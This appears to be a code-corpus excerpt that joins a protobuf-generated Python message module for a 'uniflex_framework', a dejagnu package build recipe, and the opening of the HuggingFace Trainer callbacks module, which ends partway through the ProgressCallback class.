\x03(\x0b\x32\x1a.uniflex_framework.Service\"5\n\nModuleType\x12\n\n\x06MODULE\x10\x00\x12\n\n\x06\x44\x45VICE\x10\x01\x12\x0f\n\x0b\x41PPLICATION\x10\x02\"\xe4\x01\n\x0bNodeInfoMsg\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\x12\n\n\x02ip\x18\x02 \x02(\t\x12\x0c\n\x04name\x18\x03 \x02(\t\x12\x10\n\x08hostname\x18\x04 \x02(\t\x12\x0c\n\x04info\x18\x05 \x01(\t\x12*\n\x07\x64\x65vices\x18\x06 \x03(\x0b\x32\x19.uniflex_framework.Module\x12*\n\x07modules\x18\x07 \x03(\x0b\x32\x19.uniflex_framework.Module\x12/\n\x0c\x61pplications\x18\x08 \x03(\x0b\x32\x19.uniflex_framework.Module\"%\n\x0fNodeInfoRequest\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\")\n\x13NodeAddNotification\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\"1\n\x0bNodeExitMsg\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\x12\x0e\n\x06reason\x18\x02 \x01(\t\")\n\x08HelloMsg\x12\x0c\n\x04uuid\x18\x01 \x02(\t\x12\x0f\n\x07timeout\x18\x02 \x02(\r')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_MODULE_MODULETYPE = _descriptor.EnumDescriptor(
name='ModuleType',
full_name='uniflex_framework.Module.ModuleType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MODULE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEVICE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='APPLICATION', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=531,
serialized_end=584,
)
_sym_db.RegisterEnumDescriptor(_MODULE_MODULETYPE)
_ATTRIBUTE = _descriptor.Descriptor(
name='Attribute',
full_name='uniflex_framework.Attribute',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Attribute.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=37,
serialized_end=62,
)
_FUNCTION = _descriptor.Descriptor(
name='Function',
full_name='uniflex_framework.Function',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Function.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=64,
serialized_end=88,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='uniflex_framework.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Event.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=90,
serialized_end=111,
)
_SERVICE = _descriptor.Descriptor(
name='Service',
full_name='uniflex_framework.Service',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Service.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=113,
serialized_end=136,
)
_DEVICE = _descriptor.Descriptor(
name='Device',
full_name='uniflex_framework.Device',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Device.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=160,
)
_MODULE = _descriptor.Descriptor(
name='Module',
full_name='uniflex_framework.Module',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uuid', full_name='uniflex_framework.Module.uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Module.name', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='uniflex_framework.Module.type', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device', full_name='uniflex_framework.Module.device', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='uniflex_framework.Module.attributes', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='functions', full_name='uniflex_framework.Module.functions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='in_events', full_name='uniflex_framework.Module.in_events', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='out_events', full_name='uniflex_framework.Module.out_events', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='services', full_name='uniflex_framework.Module.services', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MODULE_MODULETYPE,
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=584,
)
_NODEINFOMSG = _descriptor.Descriptor(
name='NodeInfoMsg',
full_name='uniflex_framework.NodeInfoMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeInfoMsg.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ip', full_name='uniflex_framework.NodeInfoMsg.ip', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.NodeInfoMsg.name', index=2,
number=3, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hostname', full_name='uniflex_framework.NodeInfoMsg.hostname', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='info', full_name='uniflex_framework.NodeInfoMsg.info', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='devices', full_name='uniflex_framework.NodeInfoMsg.devices', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='modules', full_name='uniflex_framework.NodeInfoMsg.modules', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='applications', full_name='uniflex_framework.NodeInfoMsg.applications', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=587,
serialized_end=815,
)
_NODEINFOREQUEST = _descriptor.Descriptor(
name='NodeInfoRequest',
full_name='uniflex_framework.NodeInfoRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeInfoRequest.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=817,
serialized_end=854,
)
_NODEADDNOTIFICATION = _descriptor.Descriptor(
name='NodeAddNotification',
full_name='uniflex_framework.NodeAddNotification',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeAddNotification.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=856,
serialized_end=897,
)
_NODEEXITMSG = _descriptor.Descriptor(
name='NodeExitMsg',
full_name='uniflex_framework.NodeExitMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeExitMsg.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reason', full_name='uniflex_framework.NodeExitMsg.reason', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=899,
serialized_end=948,
)
_HELLOMSG = _descriptor.Descriptor(
name='HelloMsg',
full_name='uniflex_framework.HelloMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uuid', full_name='uniflex_framework.HelloMsg.uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timeout', full_name='uniflex_framework.HelloMsg.timeout', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=950,
serialized_end=991,
)
_MODULE.fields_by_name['type'].enum_type = _MODULE_MODULETYPE
_MODULE.fields_by_name['device'].message_type = _DEVICE
_MODULE.fields_by_name['attributes'].message_type = _ATTRIBUTE
_MODULE.fields_by_name['functions'].message_type = _FUNCTION
_MODULE.fields_by_name['in_events'].message_type = _EVENT
_MODULE.fields_by_name['out_events'].message_type = _EVENT
_MODULE.fields_by_name['services'].message_type = _SERVICE
_MODULE_MODULETYPE.containing_type = _MODULE
_NODEINFOMSG.fields_by_name['devices'].message_type = _MODULE
_NODEINFOMSG.fields_by_name['modules'].message_type = _MODULE
_NODEINFOMSG.fields_by_name['applications'].message_type = _MODULE
DESCRIPTOR.message_types_by_name['Attribute'] = _ATTRIBUTE
DESCRIPTOR.message_types_by_name['Function'] = _FUNCTION
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
DESCRIPTOR.message_types_by_name['Service'] = _SERVICE
DESCRIPTOR.message_types_by_name['Device'] = _DEVICE
DESCRIPTOR.message_types_by_name['Module'] = _MODULE
DESCRIPTOR.message_types_by_name['NodeInfoMsg'] = _NODEINFOMSG
DESCRIPTOR.message_types_by_name['NodeInfoRequest'] = _NODEINFOREQUEST
DESCRIPTOR.message_types_by_name['NodeAddNotification'] = _NODEADDNOTIFICATION
DESCRIPTOR.message_types_by_name['NodeExitMsg'] = _NODEEXITMSG
DESCRIPTOR.message_types_by_name['HelloMsg'] = _HELLOMSG
Attribute = _reflection.GeneratedProtocolMessageType('Attribute', (_message.Message,), dict(
DESCRIPTOR = _ATTRIBUTE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Attribute)
))
_sym_db.RegisterMessage(Attribute)
Function = _reflection.GeneratedProtocolMessageType('Function', (_message.Message,), dict(
DESCRIPTOR = _FUNCTION,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Function)
))
_sym_db.RegisterMessage(Function)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Event)
))
_sym_db.RegisterMessage(Event)
Service = _reflection.GeneratedProtocolMessageType('Service', (_message.Message,), dict(
DESCRIPTOR = _SERVICE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Service)
))
_sym_db.RegisterMessage(Service)
Device = _reflection.GeneratedProtocolMessageType('Device', (_message.Message,), dict(
DESCRIPTOR = _DEVICE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Device)
))
_sym_db.RegisterMessage(Device)
Module = _reflection.GeneratedProtocolMessageType('Module', (_message.Message,), dict(
DESCRIPTOR = _MODULE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Module)
))
_sym_db.RegisterMessage(Module)
NodeInfoMsg = _reflection.GeneratedProtocolMessageType('NodeInfoMsg', (_message.Message,), dict(
DESCRIPTOR = _NODEINFOMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeInfoMsg)
))
_sym_db.RegisterMessage(NodeInfoMsg)
NodeInfoRequest = _reflection.GeneratedProtocolMessageType('NodeInfoRequest', (_message.Message,), dict(
DESCRIPTOR = _NODEINFOREQUEST,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeInfoRequest)
))
_sym_db.RegisterMessage(NodeInfoRequest)
NodeAddNotification = _reflection.GeneratedProtocolMessageType('NodeAddNotification', (_message.Message,), dict(
DESCRIPTOR = _NODEADDNOTIFICATION,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeAddNotification)
))
_sym_db.RegisterMessage(NodeAddNotification)
NodeExitMsg = _reflection.GeneratedProtocolMessageType('NodeExitMsg', (_message.Message,), dict(
DESCRIPTOR = _NODEEXITMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeExitMsg)
))
_sym_db.RegisterMessage(NodeExitMsg)
HelloMsg = _reflection.GeneratedProtocolMessageType('HelloMsg', (_message.Message,), dict(
DESCRIPTOR = _HELLOMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.HelloMsg)
))
_sym_db.RegisterMessage(HelloMsg)
# @@protoc_insertion_point(module_scope)
|
py | 1a4a0dd0115ddc796492450b61728b896da0e787 | pkgname = "dejagnu"
pkgver = "1.6.3"
pkgrel = 0
build_style = "gnu_configure"
make_cmd = "gmake"
hostmakedepends = ["gmake", "expect-devel"]
makedepends = ["expect-devel"]
depends = ["expect"]
pkgdesc = "Framework for running test suites on GNU tools"
maintainer = "q66 <[email protected]>"
license = "GPL-3.0-or-later"
url = "http://www.gnu.org/software/dejagnu"
source = f"$(GNU_SITE)/{pkgname}/{pkgname}-{pkgver}.tar.gz"
sha256 = "87daefacd7958b4a69f88c6856dbd1634261963c414079d0c371f589cd66a2e3"
# like 4 tests fail and it's impossible to tell what is going on
options = ["!check"] |
py | 1a4a0eae75c37a941158b11a56a14c2cd1d97ae8 | # coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Callbacks to use with the Trainer class and customize the training loop.
"""
import collections
import dataclasses
import json
from dataclasses import dataclass
from typing import Dict, List, Optional, Union
import numpy as np
from tqdm.auto import tqdm
from .trainer_utils import IntervalStrategy
from .training_args import TrainingArguments
from .utils import logging
logger = logging.get_logger(__name__)
@dataclass
class TrainerState:
"""
A class containing the [`Trainer`] inner state that will be saved along the model and optimizer
when checkpointing and passed to the [`TrainerCallback`].
<Tip>
In all this class, one step is to be understood as one update step. When using gradient accumulation, one
update step may require several forward and backward passes: if you use `gradient_accumulation_steps=n`,
then one update step requires going through *n* batches.
</Tip>
Args:
epoch (`float`, *optional*):
Only set during training, will represent the epoch the training is at (the decimal part being the
percentage of the current epoch completed).
global_step (`int`, *optional*, defaults to 0):
During training, represents the number of update steps completed.
max_steps (`int`, *optional*, defaults to 0):
The number of update steps to do during the current training.
total_flos (`float`, *optional*, defaults to 0):
The total number of floating operations done by the model since the beginning of training (stored as floats
to avoid overflow).
log_history (`List[Dict[str, float]]`, *optional*):
The list of logs done since the beginning of training.
best_metric (`float`, *optional*):
When tracking the best model, the value of the best metric encountered so far.
best_model_checkpoint (`str`, *optional*):
When tracking the best model, the value of the name of the checkpoint for the best model encountered so
far.
is_local_process_zero (`bool`, *optional*, defaults to `True`):
Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on
several machines) main process.
is_world_process_zero (`bool`, *optional*, defaults to `True`):
Whether or not this process is the global main process (when training in a distributed fashion on several
machines, this is only going to be `True` for one process).
is_hyper_param_search (`bool`, *optional*, defaults to `False`):
Whether we are in the process of a hyper parameter search using Trainer.hyperparameter_search. This will
impact the way data will be logged in TensorBoard.
"""
epoch: Optional[float] = None
global_step: int = 0
max_steps: int = 0
num_train_epochs: int = 0
total_flos: float = 0
log_history: List[Dict[str, float]] = None
best_metric: Optional[float] = None
best_model_checkpoint: Optional[str] = None
is_local_process_zero: bool = True
is_world_process_zero: bool = True
is_hyper_param_search: bool = False
trial_name: str = None
trial_params: Dict[str, Union[str, float, int, bool]] = None
def __post_init__(self):
if self.log_history is None:
self.log_history = []
def save_to_json(self, json_path: str):
"""Save the content of this instance in JSON format inside `json_path`."""
json_string = json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + "\n"
with open(json_path, "w", encoding="utf-8") as f:
f.write(json_string)
@classmethod
def load_from_json(cls, json_path: str):
"""Create an instance from the content of `json_path`."""
with open(json_path, "r", encoding="utf-8") as f:
text = f.read()
return cls(**json.loads(text))
@dataclass
class TrainerControl:
"""
A class that handles the [`Trainer`] control flow. This class is used by the
[`TrainerCallback`] to activate some switches in the training loop.
Args:
should_training_stop (`bool`, *optional*, defaults to `False`):
Whether or not the training should be interrupted.
If `True`, this variable will not be set back to `False`. The training will just stop.
should_epoch_stop (`bool`, *optional*, defaults to `False`):
Whether or not the current epoch should be interrupted.
If `True`, this variable will be set back to `False` at the beginning of the next epoch.
should_save (`bool`, *optional*, defaults to `False`):
Whether or not the model should be saved at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
should_evaluate (`bool`, *optional*, defaults to `False`):
Whether or not the model should be evaluated at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
should_log (`bool`, *optional*, defaults to `False`):
Whether or not the logs should be reported at this step.
If `True`, this variable will be set back to `False` at the beginning of the next step.
"""
should_training_stop: bool = False
should_epoch_stop: bool = False
should_save: bool = False
should_evaluate: bool = False
should_log: bool = False
def _new_training(self):
"""Internal method that resets the variable for a new training."""
self.should_training_stop = False
def _new_epoch(self):
"""Internal method that resets the variable for a new epoch."""
self.should_epoch_stop = False
def _new_step(self):
"""Internal method that resets the variable for a new step."""
self.should_save = False
self.should_evaluate = False
self.should_log = False
class TrainerCallback:
"""
A class for objects that will inspect the state of the training loop at some events and take some decisions. At
each of those events the following arguments are available:
Args:
args ([`TrainingArguments`]):
The training arguments used to instantiate the [`Trainer`].
state ([`TrainerState`]):
The current state of the [`Trainer`].
control ([`TrainerControl`]):
The object that is returned to the [`Trainer`] and can be used to make some decisions.
model ([`PreTrainedModel`] or `torch.nn.Module`):
The model being trained.
tokenizer ([`PreTrainedTokenizer`]):
The tokenizer used for encoding the data.
optimizer (`torch.optim.Optimizer`):
The optimizer used for the training steps.
lr_scheduler (`torch.optim.lr_scheduler.LambdaLR`):
The scheduler used for setting the learning rate.
train_dataloader (`torch.utils.data.DataLoader`, *optional*):
The current dataloader used for training.
eval_dataloader (`torch.utils.data.DataLoader`, *optional*):
The current dataloader used for training.
metrics (`Dict[str, float]`):
The metrics computed by the last evaluation phase.
Those are only accessible in the event `on_evaluate`.
logs (`Dict[str, float]`):
The values to log.
Those are only accessible in the event `on_log`.
The `control` object is the only one that can be changed by the callback, in which case the event that changes
it should return the modified version.
The argument `args`, `state` and `control` are positionals for all events, all the others are
grouped in `kwargs`. You can unpack the ones you need in the signature of the event using them. As an example,
see the code of the simple [`~transformer.PrinterCallback`].
Example:
```python
class PrinterCallback(TrainerCallback):
def on_log(self, args, state, control, logs=None, **kwargs):
_ = logs.pop("total_flos", None)
if state.is_local_process_zero:
print(logs)
```"""
def on_init_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of the initialization of the [`Trainer`].
"""
pass
def on_train_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of training.
"""
pass
def on_train_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of training.
"""
pass
def on_epoch_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of an epoch.
"""
pass
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of an epoch.
"""
pass
def on_step_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the beginning of a training step. If using gradient accumulation, one training step might take
several inputs.
"""
pass
def on_substep_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of an substep during gradient accumulation.
"""
pass
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called at the end of a training step. If using gradient accumulation, one training step might take
several inputs.
"""
pass
def on_evaluate(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after an evaluation phase.
"""
pass
def on_save(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after a checkpoint save.
"""
pass
def on_log(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after logging the last logs.
"""
pass
def on_prediction_step(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
"""
Event called after a prediction step.
"""
pass
class CallbackHandler(TrainerCallback):
"""Internal class that just calls the list of callbacks in order."""
def __init__(self, callbacks, model, tokenizer, optimizer, lr_scheduler):
self.callbacks = []
for cb in callbacks:
self.add_callback(cb)
self.model = model
self.tokenizer = tokenizer
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.train_dataloader = None
self.eval_dataloader = None
if not any(isinstance(cb, DefaultFlowCallback) for cb in self.callbacks):
logger.warning(
"The Trainer will not work properly if you don't have a `DefaultFlowCallback` in its callbacks. You\n"
+ "should add one before training with `trainer.add_callback(DefaultFlowCallback). The current list of"
+ "callbacks is\n:"
+ self.callback_list
)
def add_callback(self, callback):
cb = callback() if isinstance(callback, type) else callback
cb_class = callback if isinstance(callback, type) else callback.__class__
if cb_class in [c.__class__ for c in self.callbacks]:
logger.warning(
f"You are adding a {cb_class} to the callbacks of this Trainer, but there is already one. The current"
+ "list of callbacks is\n:"
+ self.callback_list
)
self.callbacks.append(cb)
def pop_callback(self, callback):
if isinstance(callback, type):
for cb in self.callbacks:
if isinstance(cb, callback):
self.callbacks.remove(cb)
return cb
else:
for cb in self.callbacks:
if cb == callback:
self.callbacks.remove(cb)
return cb
def remove_callback(self, callback):
if isinstance(callback, type):
for cb in self.callbacks:
if isinstance(cb, callback):
self.callbacks.remove(cb)
return
else:
self.callbacks.remove(callback)
@property
def callback_list(self):
return "\n".join(cb.__class__.__name__ for cb in self.callbacks)
def on_init_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_init_end", args, state, control)
def on_train_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_training_stop = False
return self.call_event("on_train_begin", args, state, control)
def on_train_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_train_end", args, state, control)
def on_epoch_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_epoch_stop = False
return self.call_event("on_epoch_begin", args, state, control)
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_epoch_end", args, state, control)
def on_step_begin(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_log = False
control.should_evaluate = False
control.should_save = False
return self.call_event("on_step_begin", args, state, control)
def on_substep_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_substep_end", args, state, control)
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_step_end", args, state, control)
def on_evaluate(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, metrics):
control.should_evaluate = False
return self.call_event("on_evaluate", args, state, control, metrics=metrics)
def on_save(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
control.should_save = False
return self.call_event("on_save", args, state, control)
def on_log(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, logs):
control.should_log = False
return self.call_event("on_log", args, state, control, logs=logs)
def on_prediction_step(self, args: TrainingArguments, state: TrainerState, control: TrainerControl):
return self.call_event("on_prediction_step", args, state, control)
def call_event(self, event, args, state, control, **kwargs):
for callback in self.callbacks:
result = getattr(callback, event)(
args,
state,
control,
model=self.model,
tokenizer=self.tokenizer,
optimizer=self.optimizer,
lr_scheduler=self.lr_scheduler,
train_dataloader=self.train_dataloader,
eval_dataloader=self.eval_dataloader,
**kwargs,
)
# A Callback can skip the return of `control` if it doesn't change it.
if result is not None:
control = result
return control
class DefaultFlowCallback(TrainerCallback):
"""
A [`TrainerCallback`] that handles the default flow of the training loop for logs, evaluation
and checkpoints.
"""
def on_step_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
# Log
if state.global_step == 1 and args.logging_first_step:
control.should_log = True
if args.logging_strategy == IntervalStrategy.STEPS and state.global_step % args.logging_steps == 0:
control.should_log = True
# Evaluate
if args.evaluation_strategy == IntervalStrategy.STEPS and state.global_step % args.eval_steps == 0:
control.should_evaluate = True
# Save
if (
args.save_strategy == IntervalStrategy.STEPS
and args.save_steps > 0
and state.global_step % args.save_steps == 0
):
control.should_save = True
# End training
if state.global_step >= state.max_steps:
control.should_training_stop = True
return control
def on_epoch_end(self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs):
# Log
if args.logging_strategy == IntervalStrategy.EPOCH:
control.should_log = True
# Evaluate
if args.evaluation_strategy == IntervalStrategy.EPOCH:
control.should_evaluate = True
# Save
if args.save_strategy == IntervalStrategy.EPOCH:
control.should_save = True
return control
class ProgressCallback(TrainerCallback):
"""
A [`TrainerCallback`] that displays the progress of training or evaluation.
"""
